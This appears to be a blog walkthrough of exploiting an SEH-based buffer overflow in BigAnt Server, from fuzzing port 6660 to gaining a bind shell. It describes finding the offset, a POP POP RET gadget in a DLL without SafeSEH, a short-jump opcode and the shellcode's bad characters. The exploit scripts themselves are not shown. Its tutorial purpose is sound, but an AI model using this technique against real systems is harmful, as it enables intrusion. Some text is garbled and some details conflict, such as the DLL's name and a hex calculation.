In this article I will try to exploit the application BigAnt Server SP5 version 2:52, in this application there is a system of safeguards against errors or SEH, the first thing I do is analyze traffic data packet to identify applications that run port is also used
After obtaining the required information then compile a python script as a fuzzer, including the following
After building a fuzzer then we attach AntServer service with port 6660 through theImmunity Debugger
Once the application has run and run BigAnt fuzzer that has been previously designed totransmit data packets at the application
After running the fuzzer should be viewed in the Immunity debugger memory condition changes due to the amount of data that is sent to the character apkikasi fuzzer to be likethis
ESI can be seen on the memory stricken with the character "A" but EIP is not overwritten,it is proved if the application has a system SEH, to be able to see SEH Chain
In the display data buffer that is sent in and terimpan in SEH Chain, and to continue into the EIP can press SHIFT + F9
At the bottom of the stack memory in the visible lines of ASCII characters A overwritestack memory to do the memory dump to see the data buffer in memory
Moving into the memory stack on the left I'll open a DLL file in the module that thisJETVBA32.DLL chosen because this file does not have the features of Image DLLCharacteristcs No. SEH SEH is a security system to avoid exploitation in memory with the command did not recognize, to prove it can Backtrack to copy files in and using theMetasploit MSFPESCAN tools for counting and analyzing further, back to theexecutable module and choose JETVBA32.DLL
Once this phase is necessary to find the line POP R32, R32 and POP RETN as a basefor EIP so to bypass SEH SEH will be passed directly into the EIP so that we will be able to control the value of EIP, in this stage we need to do a right click on the area of the leftabove or in the module and look for Sequance for Command
After filling out a bar to search the contents of the variable se [erti in the picture, namelyPOP R32, R32 and POP RETN to find rows with a combination like that, and then the page will look into the series in question
After getting the address in question we can find offetnya to override the character stringwith a Pattern Create erstring Metasploit for which we will generate entries in the ScriptBuffer fuzzer as cargo, and the results of the script is as follows
And we run the script to see the value of EIP to calculate the interval data byte in memory
After entering the stage of the bypass is done in SEH chain and we can see the value ofEIP for offtet calculated in Metasploit
After getting the value of EIP do the counting process to determine the byte offsetdistance interval to EIP
Offset results can be included in the fuzzer script variables and script fuzzer would turn into such a here
After preparing the script to be like this I would try to run it and see what happens to themonitoring Immunitity Debugger
And we see in the SEH SEH Chain to ensure that affected the character buffer "41" delivered to the application fuzzer
After getting the address of SEH, the thing to do is bypass the SEH address servicrunning with no load protection as the previous DLL JETVBA32.DLL I use the DLL anduse the address to include it in the script fuzzer
after drawing up a fuzzer script to be like the picture I try to run it
Address VBAJET32.DLL fill in the SEH Chain and this proves that the address iscorrect, after that press SHIFT + F9 to continue to address the EIP
Then press Shift + F7 to view the location of the stack in memory, it is proved that the order and work flow is correct, samapai this stage we can menyimpulakn that addressEIP and SEH have been identified and the next is to execute Bypass SEH for EIP
In the picture can be seen that a small number of bytes is not possible to insert a payloadfor the exploit code so we need to move the location of the address is greater, do the following
That can to read empty space there are much area from 016FFD7C to 16FFFF, to count we need do 016FFFF-016FFD7C, in decimal we can remove same character there is 016F from both variable so here is FFF-D7C (4095-3452) = 645 or 0x285 in hex
Then now we can use this interval to save shellcode and for base to jump, in assambly JMP SHORT have OPCODE \xEB\xZZ , ZZ mean is variable can to use jump to whatever point give inside for example if there xEB\x08 that will jump 8 byte forward, and now I use 6 byte, 4 byte for bypass SEH or other mean is jump operation without SEH and 2 of 6 byte is for stock, here is OPCODE I use to interst in script fuzze \xEB\x06\x90\x90, and this not finish just here, we need to addjumsent PAYLOAD Shellcode. to generate it I use Metasploit
After generate payload here I insert this variable into fuzzer script like this
Then try to make connection in port 6666 with IP 192.168.56.101
This failed to make connection after check in SEH Chain that is not go to 90909090 but still in JETVBA.DLL that mean payload unsuccess to go to EIP however fuzzer id success sending data, the solution is must to find Bad Character in Shellcode or PAYLOAD and regenerate PAYLOAD without bad character, to find this is need so carefull indentify on each payload sent, so here is bad character in payload 0x00 0x0a 0x0d 0x20 0x25 and 0x40 here is payload without bad character
Then insert again that payload code to script fuzzer inside, here is last script I has modified for exploit Bigant Server
Then this is success to exploit and force into the system's target, the problem before is causes bad character inside the payload, the bad character list is 0x00, 0x0a, 0x0d, 0x20, 0x25 and 0x40, you one of that listed include in payload will be failed
No comments:
Post a Comment